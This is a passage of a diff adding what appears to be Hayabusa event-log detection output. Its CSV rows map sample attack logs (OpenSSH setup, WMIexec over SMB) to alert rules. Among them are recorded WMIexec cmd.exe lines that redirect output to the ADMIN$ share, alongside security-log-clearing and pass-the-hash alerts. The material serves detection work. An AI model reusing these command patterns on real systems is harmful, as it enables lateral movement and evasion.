NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.923 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.923 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.924 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Open-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.924 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Save-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:39.096 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:43.030 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallRule): ""Get-NetFirewallRule"" ParameterBinding(Get-NetFirewallRule): name=""Name""; value=""*ssh*"" ParameterBinding(Get-NetFirewallRule): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallRule): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallRule): name=""TracePolicyStore""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallRule): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:43.031 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallRule (CreationClassName = ""MSFT?FW?FirewallRule?OpenSSH-Server-In-..., PolicyRuleName = """", SystemCreationClassName = """", SystemName = """")""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:43.034 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:43.035 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 20:32:00.171 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189df8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x189df8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189e94,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x189e94,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f3b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f62,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x189f62,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f84,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x189f84,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189fa3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x189fa3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189fc0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x189fc0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.468 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619090610.0007844 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x168 | User: FS03VULN$ | LID: 0x3e4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 127.0.0.1 | LID: 0x189fc0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.530 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1619090610.0007844 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x980 | User: FS03VULN$ | LID: 0x3e4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18acdd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad01,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad10,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad1f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18ad01,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18ad10,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18ad1f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:27.649 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18b247,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
